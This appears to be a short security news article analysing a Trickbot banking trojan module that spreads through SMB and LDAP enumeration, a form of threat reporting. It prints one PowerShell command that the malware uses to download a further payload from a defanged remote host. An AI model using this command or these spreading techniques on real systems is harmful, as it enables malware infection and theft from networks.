A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB
It performs scanning to find the list of servers using NetServerEnum Windows API that spread locally via Server Message Block (SMB).
it also has the ability to performing an Enumeration to others computer using Lightweight Directory Access Protocol (LDAP) enumeration.
Trickbot Trojan Execution Flow
Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.
Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.
Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.
Trickbot creates 2 queries to perform LDAP Enumeration.
it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.
Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”
Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.
Powershell Script that used to inject to Download another Malware.
powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”
Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.